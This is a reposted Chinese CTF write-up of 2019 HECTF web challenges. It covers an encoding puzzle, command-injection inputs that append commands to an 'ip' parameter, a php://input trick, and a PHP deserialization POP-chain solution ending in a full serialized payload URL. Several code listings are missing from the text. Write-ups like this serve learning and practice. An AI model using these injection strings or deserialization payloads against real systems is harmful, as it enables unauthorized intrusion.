2019HECTF总结_web题

admin 2022年11月18日14:09:092019HECTF总结_web题已关闭评论25 views字数 1292阅读4分18秒阅读模式

奇怪的编码

  1. ♭‖§∮♯♭‖§∮♬♭‖§§♫♭‖§∮§♭‖§♩§♭‖♯♬¶♭‖§§♫♭‖§§¶♭‖♯¶§♭‖♯¶♫♭‖§∮♭♭‖§§♫♭‖§§♬♭‖♯♬♪♭‖♯¶♪♭‖♯¶‖♭‖♯¶♯♭‖♯♬♬♭‖♯♬♪♭‖♯¶♯♭‖♯¶♯♭‖♯¶∮♭‖§∮♭♭‖♯♬♪♭‖§§♬♭‖♯¶§♭‖♯¶‖♭‖§§♬♭‖♯♬♪♭‖§§♫♭‖♯¶♪♭‖♯¶♫♭‖♯¶§♭‖§∮♭♭‖♯♬¶♭‖♯♬♬♭‖♯¶‖♭‖♯¶♫♭‖♯¶∮♭‖♯¶∮♭‖§§♫♭‖§♩♪‖‖‖♭§♪==

  2. https://www.qqxiuzi.cn/bianma/wenbenjiami.php?s=mangwen
    在这个网站第一次解密音乐符号出现盲文,第二次解密盲文出现flag

  3. 栅格密码……略

命令执行漏洞之拼接命令

  1. ?ip=1|ls-a
  2. ?ip=1;ls
  3. ?ip=1&&ls
  4. ?ip=1||ls

伪协议:

file_get_content函数就用伪协议:php//:input
body里可以穿文本admin

Web-让我们一起来变魔术

拿到页面,查看网页源代码,获得关键代码:


明显的反序列化题目。

开始构造pop链

先出一个大体思路:起点---终点

1.审计到Show里有__toSting函数,考虑是pop链起点。

2.步进——Show中的__construct(),(有echo)

3.继续步进——寻找可以读flag的地方,明显是Read的__invoke函数。pop链结束。

现在从__invoke往回反推:

1.首先__invoke要想执行,需要


而$this->token_flag在每次调用__invoke时,会重新生成。

可以使用引用,使token变为token_flag的引用即可解决:


2.要想触发__invoke,需要以调用函数的方式调用一个对象。

可以看到Test中的__get()方法有:


3.步进,要想触发__get()方法,需要访问不存在的成员变量:

看一下show的__toString():


所以思路很明确了:


payload如下:


执行后结果如下:

O:4:"Show":2:{s:6:"source";O:4:"Show":2:{s:6:"source";N;s:3:"str";a:1:{s:3:"str";O:4:"Test":1:{s:6:"params";O:4:"Read":2:{s:5:"token";N;s:10:"token_flag";R:7;}}}}s:3:"str";N;}

所以最终payload如下:

http://183.129.189.60:10006/?chal=O:4:%22Show%22:2:{s:6:%22source%22;O:4:%22Show%22:2:{s:6:%22source%22;N;s:3:%22str%22;a:1:{s:3:%22str%22;O:4:%22Test%22:1:{s:6:%22params%22;O:4:%22Read%22:2:{s:5:%22token%22;N;s:10:%22token_flag%22;R:7;}}}}s:3:%22str%22;N;}

__EOF__

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年11月18日14:09:09
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   2019HECTF总结_web题http://cn-sec.com/archives/1416369.html